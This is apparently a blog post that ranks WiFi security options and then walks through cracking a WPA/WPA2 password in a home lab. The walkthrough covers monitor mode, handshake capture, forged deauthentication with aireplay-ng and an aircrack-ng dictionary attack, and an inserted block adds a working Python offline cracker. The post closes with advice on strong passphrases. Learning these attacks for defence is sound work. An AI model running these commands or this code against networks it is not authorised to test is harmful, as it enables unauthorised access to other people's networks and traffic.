WIFI : Hacking & Which security method will work for your network.

Aditya Kumar
7 min read · Feb 26, 2021

Here is the basic rating, from best to worst, of the modern WiFi security methods available on modern routers:

WPA2 + AES

WPA + AES

WPA + TKIP/AES (TKIP is there as a fallback method)

WPA + TKIP

WEP

Open Network (no security at all)

The best way to go is to disable Wi-Fi Protected Setup (WPS), whose PIN can be brute-forced independently of your passphrase, and set the router to WPA2 + AES. As you go down the list you get less security for your network. If your router offers WPA3, it supersedes everything on this list.

Purpose
Both WPA and WPA2 are meant to secure wireless networks from unauthorized access. If you leave your router with no security, anyone in radio range can use your bandwidth, perform illegal actions over your connection and in your name, monitor your web activity, and attack the devices on your LAN directly.

WPA vs. WPA2

Wi-Fi routers support a variety of security protocols to secure wireless networks: WEP, WPA and WPA2. WEP is broken (its key can be recovered from captured traffic in minutes), and WPA2 is recommended over its predecessor WPA (Wi-Fi Protected Access).

Probably the only downside of WPA2 is how much processing power it needs to protect your network. This means more powerful hardware is needed to avoid lower network performance. This issue concerns older access points that were implemented before WPA2 and only support WPA2 via a firmware upgrade. Most of the current access points have been supplied with more capable hardware.

Definitely use WPA2 if you can, and only use WPA if there is no way your access point will support WPA2. WPA is also an option when your access point regularly experiences high loads and network speed suffers under WPA2. When security is the top priority, rolling back is not an option; instead, seriously consider getting better access points. WEP should only ever be a last resort when neither WPA standard is available, and you should treat a WEP network as effectively open.

Encryption Speed
Depending on which security protocol you use, data speed can be affected. In practice WPA2 with AES is the fastest: 802.11n and later only allow the high-throughput data rates with CCMP (AES) or no encryption, so a network running TKIP or WEP is held to the older 54 Mbps rates regardless of the hardware.

In a general sense, Wi-Fi refers to the wireless LAN technologies that use the IEEE 802.11 standards for communication. Wi-Fi devices use radio waves to carry data from a client device to an access point (in home setups usually built into the router), and the router completes the connection to other devices on the LAN, the WAN or the internet.

Hello Readers, I am Aditya Kumar, currently enrolled in the Master Certificate in Cyber Security (Red Team) program at HackerU. This is my first blog and I want to share some of my learnings with you about common WPA/WPA2 attacks and how to crack any WPA or WPA2 Wi-Fi network, provided you have a dictionary that will crack the WPA handshake.

Wi-Fi hacking is fascinating, and it can bring down networks with weak or common passwords. Wi-Fi is a necessity for everyone exploring the internet. The term hacking may sound juvenile, but the victim of a weak password is genuinely exposed. We will quickly go through a series of steps for attacking a WPA/WPA2 Wi-Fi network.

The WPA/WPA2 attack shown here is an offline dictionary attack (a form of brute force): once the 4-way handshake is captured, every candidate password is tested against it on the attacker's machine, with no further contact with the router and nothing the router can rate-limit. So we should also know how long each type of password takes to crack.

That depends on your GPU (if you are using one) and the resources allocated to the Kali virtual machine. Each WPA candidate costs 4096 iterations of PBKDF2-SHA1, which is why a GPU-backed cracker such as hashcat is far faster than aircrack-ng on a CPU.

WIFI Password Cracking For WPA & WPA2 (Home Lab)

Pre-requisites

  1. Kali Linux
  2. Aircrack-ng suite ( pre-installed in kali)
  3. Wi-Fi adapter (monitor mode compatible)
  4. WIFI Router (In this attack I am going to use my Wifi router)

Setup:

First connect the Wi-Fi dongle to the Kali machine. Then confirm that the dongle shows up as a network interface with:

iwconfig

Step 1- Enabling monitor mode

Enable monitor mode on your wireless adapter so it can monitor all the wireless traffic

The Adapter is working

The mode is currently Managed. We enable Monitor mode on the Wi-Fi dongle with:

airmon-ng start wlan0

If NetworkManager or wpa_supplicant keeps resetting the interface, run airmon-ng check kill first; it stops those services, so restart them (or reboot) when you are done.

As you can see Monitor mode is Enabled

We will Double check with :

iwconfig

As you can see wlan0 has changed to wlan0mon and the Mode is Monitor.

Step 2- Monitor wireless connection and capture packets

Start airodump-ng on the monitor interface to list every access point and client in range and single out the target:

airodump-ng wlan0mon

In the output, BSSID is the MAC address of the router, CH is its channel, ENC/CIPHER show the security in use (e.g. WPA2 CCMP) and ESSID is the network name. The lower table lists the clients (STATION) associated with each BSSID. Note the target's BSSID and channel for the next step.

STEP 3 -Dumping Data packets & capturing Handshake

To capture the handshake we lock airodump-ng onto the target's BSSID and channel and write everything it sees to a capture file:

airodump-ng --bssid C4:71:54:0B:5B:A0 -c 1 -w AK wlan0mon

This captures data packets from the network Aditya and writes them to files prefixed AK (airodump-ng appends a sequence number, so the capture is AK-01.cap). Here --bssid is the target's MAC address and -c is the channel number; fixing the channel matters because an adapter that keeps hopping channels will miss some of the four handshake frames. When a client completes the 4-way handshake, airodump-ng shows WPA handshake: C4:71:54:0B:5B:A0 in the top right of its display.

Now we have to wait for a device to connect to the target so we can capture the handshake, which is what we crack the password from. If no new device connects, we can knock the existing clients off the target with a deauthentication attack so that they reconnect.

Note:

The handshake is only captured when a client (re)connects to the network. Waiting for that is not always possible: the user may not be at home, or every device may already be connected and stay connected. In that case we use a deauthentication attack with aireplay-ng. It sends forged deauthentication frames that make the client drop off the network, and when the client automatically reconnects we capture the handshake. Keep airodump-ng from step 3 running in a second terminal while you do this.

Use this only if you are not getting a WPA Handshake:

aireplay-ng -0 1 -a <target_MAC_address> -c <client_MAC_address> wlan0mon

  • -0 means deauthentication
  • 1 is the number of deauth bursts to send (you can send more, or 0 for a continuous stream)
  • -a is the BSSID of the access point, -c the MAC of the client to kick (take it from the STATION column of airodump-ng); if -c is omitted the deauth is broadcast to every client on the network
  • the interface must be the monitor-mode interface (wlan0mon), not wlan0

This works because deauthentication frames are not authenticated in WPA/WPA2; a network with Protected Management Frames (802.11w) enabled ignores forged deauths, and you have to wait for a natural reconnect.

Anyway we got the Handshake so we won’t be needing the Deauth-Attack.

Step 4-Cracking the WPA/WPA2 password.

We are going to brute-force it. A brute-force attack tries password candidates one after another in the hope of hitting the right one; it can be done manually or with an automated script. Against an online login the server can throttle or lock out the attempts, but here the attack is offline: the captured handshake lets us test every guess locally, and the only cost is computation.

This is an old attack method, but it is still effective and popular, because depending on the length and complexity of the password, cracking it can take anywhere from a few seconds to many years.

There are 5 Types of Brute Force Attacks:

  • Simple Brute Force Attacks
  • Dictionary Attacks
  • Hybrid Brute Force Attacks
  • Reverse Brute Force Attacks
  • Credential Stuffing

We are Going to use Dictionary Attack.

Dictionary attacks: in a standard attack, a hacker chooses a target and runs possible passwords against that username. These are known as dictionary attacks. Dictionary attacks are the most basic tool in brute force attacks. While not necessarily being brute force attacks in themselves, these are often used as an important component for password cracking. Some hackers run through unabridged dictionaries and augment words with special characters and numerals or use special dictionaries of words, but this type of sequential attack is cumbersome.

There are various wordlists available on the internet. For example, rockyou.txt (shipped with Kali under /usr/share/wordlists) contains millions of real leaked passwords, which is why it is the usual first choice. Which passwords you can crack depends entirely on the wordlist: if the passphrase is not in it, the attack fails no matter how long it runs. Generic rainbow tables do not help against WPA, because the SSID is used as a salt when deriving the key, so a precomputed table is only valid for one SSID (such tables exist for the most common default SSIDs and run to gigabytes in size). For large wordlists you want GPU cracking, and if the password is long and random the attack may take years.

This is the .Cap file which was created.

ls

Now, to crack the password, run aircrack-ng on AK-01.cap with a wordlist. Here the DirBuster directory list that ships with Kali is used as the wordlist; rockyou.txt is the more usual choice for passwords.

aircrack-ng -b C4:71:54:0B:5B:A0 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt AK-01.cap

-b selects the target BSSID (you can use -e with the ESSID instead) and -w the wordlist. aircrack-ng derives the key from each candidate in directory-list-lowercase-2.3-medium.txt and checks it against the MIC in the captured handshake; with this wordlist we were able to crack the password. If it reports that there is no valid WPA handshake in the file, go back to step 3.
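What aircrack-ng is doing for each word in that list, as an added example that is not part of the original post and not aircrack-ng's own code: the candidate passphrase is turned into the PMK with PBKDF2-HMAC-SHA1 (4096 rounds, SSID as salt), expanded into the PTK with PRF-512 over both MAC addresses and both nonces, and the first 16 bytes (the KCK) are used to recompute the MIC over EAPOL message 2 of the handshake. A match means the passphrase is right. The handshake below is constructed in code rather than read from a .cap file; the client MAC, the nonces and the passphrase are hypothetical, the BSSID is the one from the post.

```python
#!/usr/bin/env python3
"""Offline WPA/WPA2-PSK dictionary attack against a captured 4-way handshake.

Added example, not the post's own code. It re-implements the per-candidate
check aircrack-ng performs: passphrase -> PMK -> PTK -> KCK -> EAPOL MIC.
The "capture" is constructed in make_sample_handshake(); its client MAC,
nonces and passphrase are hypothetical.
"""
import hashlib
import hmac
from typing import Iterable, Optional

MIC_OFFSET = 81   # offset of the 16-byte Key MIC inside an EAPOL-Key frame
MIC_LEN = 16


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """802.11i PSK mapping: the SSID is the salt, so the PMK is per-network."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512: HMAC-SHA1(PMK, label || 0x00 || data || i) for i = 0..3, first 64 bytes."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    label = b"Pairwise key expansion"
    out = b"".join(hmac.new(pmk, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]   # KCK = [0:16], KEK = [16:32], TK = [32:48]


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """Key MIC over the EAPOL-Key frame with its MIC field zeroed.

    Key descriptor version (low 3 bits of Key Information): 1 = HMAC-MD5
    (WPA/TKIP), 2 = HMAC-SHA1 truncated to 128 bits (WPA2/CCMP).
    """
    version = int.from_bytes(eapol[5:7], "big") & 0x7
    zeroed = eapol[:MIC_OFFSET] + bytes(MIC_LEN) + eapol[MIC_OFFSET + MIC_LEN:]
    if version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    if version == 2:
        return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]
    raise ValueError("unsupported key descriptor version %d" % version)


def crack(handshake: dict, wordlist: Iterable[str]) -> Optional[str]:
    """Try each candidate passphrase; return the one whose MIC matches the capture."""
    eapol = handshake["eapol_msg2"]
    target_mic = eapol[MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    for line in wordlist:
        candidate = line.rstrip("\r\n")
        if not 8 <= len(candidate) <= 63:
            continue   # WPA-PSK passphrases are 8..63 chars; skipping saves 4096 PBKDF2 rounds each
        pmk = pmk_from_passphrase(candidate, handshake["ssid"])
        kck = ptk_from_pmk(pmk, handshake["ap_mac"], handshake["sta_mac"],
                           handshake["anonce"], handshake["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol), target_mic):
            return candidate
    return None


def build_eapol_msg2(snonce: bytes, key_info: int = 0x010A, replay_counter: int = 1) -> bytes:
    """Minimal EAPOL-Key message 2 (RSN descriptor, version 2, pairwise, MIC bit), MIC zeroed."""
    body = (bytes([2])                          # descriptor type 2 = RSN (WPA2)
            + key_info.to_bytes(2, "big")
            + (16).to_bytes(2, "big")           # key length (CCMP)
            + replay_counter.to_bytes(8, "big")
            + snonce                            # key nonce = SNonce
            + bytes(16) + bytes(8) + bytes(8)   # key IV, key RSC, reserved ID
            + bytes(MIC_LEN)                    # MIC placeholder
            + (0).to_bytes(2, "big"))           # no key data (a real msg2 carries the RSN IE)
    return bytes([1, 3]) + len(body).to_bytes(2, "big") + body   # 802.1X v1, type 3 EAPOL-Key


def make_sample_handshake(passphrase: str = "homelab2021", ssid: str = "Aditya") -> dict:
    """Constructed handshake for testing (hypothetical client MAC, nonces and passphrase)."""
    ap_mac = bytes.fromhex("c471540b5ba0")    # BSSID used in the post
    sta_mac = bytes.fromhex("001122334455")   # hypothetical client
    anonce = bytes(range(32))
    snonce = bytes(range(32, 64))
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    eapol = build_eapol_msg2(snonce)
    eapol = eapol[:MIC_OFFSET] + eapol_mic(kck, eapol) + eapol[MIC_OFFSET + MIC_LEN:]
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac,
            "anonce": anonce, "snonce": snonce, "eapol_msg2": eapol}


if __name__ == "__main__":
    hs = make_sample_handshake()
    words = ["123456", "password", "qwerty123", "homelab2021", "letmein"]   # constructed wordlist
    print("cracked:", crack(hs, words))
```

The 8-to-63 character filter is worth keeping in front of any real wordlist: rockyou.txt is full of shorter entries that can never be a WPA passphrase, and every one you skip saves 4096 PBKDF2 rounds. Note that nothing here touches the network; with the handshake in hand the router cannot throttle, log or block the guessing, which is the whole point of the passphrase advice at the end of this post.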

Protect Your WiFi Network

While WPA2 offers more protection than WPA, and both far more than WEP, the security of your router depends heavily on the password you set. WPA and WPA2 passphrases are 8 to 63 characters long.

Use as many different characters in your WiFi password as possible, and make it long: because the attack is offline, the router cannot lock the attacker out, so the length and randomness of the passphrase are the only things standing between a captured handshake and your key. Keep WPS disabled as well. Hackers are interested in easier targets; if they cannot break your password in a few minutes, they will most likely move on to look for more vulnerable networks.

Hope you found this helpful. If you liked this article or if it helped you in any way. Please leave some claps.


Aditya Kumar

B.Sc. IT graduate with CEH certification, currently pursuing Offensive Security (Red Team). Passionate about MMA and kickboxing, and an automobile enthusiast.